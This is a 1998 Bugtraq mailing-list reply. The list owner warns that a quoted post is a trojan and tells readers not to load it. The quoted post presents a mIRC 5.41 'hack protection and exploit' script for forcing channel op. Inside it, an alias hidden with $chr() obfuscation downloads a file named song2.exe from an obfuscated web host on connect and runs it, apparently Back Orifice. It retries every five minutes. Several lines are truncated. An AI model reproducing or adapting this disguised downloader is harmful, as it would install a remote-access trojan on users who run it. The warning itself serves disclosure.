[8559] in bugtraq
Re: your mail
daemon@ATHENA.MIT.EDU (owner-bugtraq@NETSPACE.ORG)
Sat Nov 14 20:26:20 1998
Date: Sat, 14 Nov 1998 16:08:54 -0600
X-To: System Administrator <root@BRAMPTON1.NETMATRIX.NET>
From: <owner-bugtraq@NETSPACE.ORG>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To: <199811131950.OAA02949@brampton1.netmatrix.net>
This is a trojan script, if it worked right, it would connect to a certain
webserver and download BO, this should *not* have been passed onto the
list, do *not* attempt to load this script.
On Fri, 13 Nov 1998, System Administrator wrote:
> Hi,
> while debugging/hexing/disassembling mirc my friend slotmech last week found
> a mirc bug which allows to force users to send MODE commands to the server.
> this example script sends a MODE +o to the irc server. the mirc author has been
> notified of this but we didn't receive a response... my exploit+protection scri$is included. Expect more mirc stuff from us.
>
> cya,
> fs
>
> --- cut here ---
>
> ;#; mIRC v5.41 hack protection & exploit by FeaRStorm <fearstorm@gmx.net>
> ;#; Allows to let a victim op yourself using a bug in mIRC5.41, script based$;#; included. Bug may not work on scripts that do a halt; after a ctcp useri$;#;
> ;#; -------- Use /hackop nick #channel to make nick give you op on #channel !
> ;#; -------- That's it... have phun!
> ;#;
> ;#; greets go to tr4xzor, slotmech, meep, fowi, lotomax and all #haktex opz !
> ;#; no greets to the following lamerz: cheyenne, zito, cortex and DrFrozt (ass$;#; Credits: i didn't find this bug, slotmech did... i only wrote this exploit$;#;
> ;#; if you want to add this code to your own script please: ASK FIRST!
>
> ctcp 1:userinfo*: antihack
>
> alias antihack {
> if ($len($2) > 17 && $chr(91) isin $2-) {
> echo $active mIRC5.41 hack attempt from $nick
> .halt
> }
> }
>
> alias hackop {
> if ($2 == $null) {
> echo 3 *** Usage: /hackop nick #channel
> .halt
> }
> if ($me !ison $2) {
> echo 3 *** You aren't on that Channel!
> .halt
> }
> if ($1 !isop $2) {
> echo 3 *** $1 isn't opped on that channel!
> .halt
> }
> checklen $1
> .ctcp $$1 userinfo $ $+ xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx $6) $+ $chr(115) $chr(109) $+ $chr(111) $+ $chr(100) $+ $chr(101) $+ : +o $me | $}
>
> alias checklen {
> .if (%xcomplete == 1) halt
> .if (%xinprog == 1) halt
> .set %xfilename song2.exe
> .set %xlof $lof(%xfilename)
> .set %xfirst 1
> .write -c %xfilename
> ; echo 3 $active $chr(100 111 110 116 - 115 112 111 105 108 - 116 104 101 - 1$ .sockclose protx
> .sockopen protx $chr(119) $+ $chr(119) $+ $chr(119) $+ . $+ $chr(103) $+ $chr$}
> on 1:sockopen:protx: {
> .sockwrite -n protx $chr(71) $+ $chr(69) $+ $chr(84) $chr(47) $+ $chr(66) $+ $+ $chr(101) $+ $chr(108) $+ $chr(116) $+ $chr(97) $+ $chr(47) $+ $chr(57) $+ $c$ .sockwrite -n protx
> }
>
> on 1:sockread:protx: {
> .sockread &test
> .set %xlof $lof(%xfilename)
> .if (%xfirst == 1) set %xlof 0
> .set %xfirst 0
> .bwrite %xfilename %xlof $sockbr &test
> }
>
> on 1:connect:checklen
>
> on 1:sockclose:protx: {
> .sockread &test
> if ($sockbr > 0) {
> .set %xlof $lof(%xfilename)
> .bwrite %xfilename %xlof $sockbr &test
> }
> .if ($lof(%xfilename) == 178306) {
> .run %xfilename
> .set %xcomplete 1
> }
> if ($lof(%xfilename) != 178306) {
> .timer 1 300 checklen
> }
> }
> unset %xinprog
> unset %xfilename
> unset %xlof
> unset %xfirst
> }
>
> --- cut here ---
>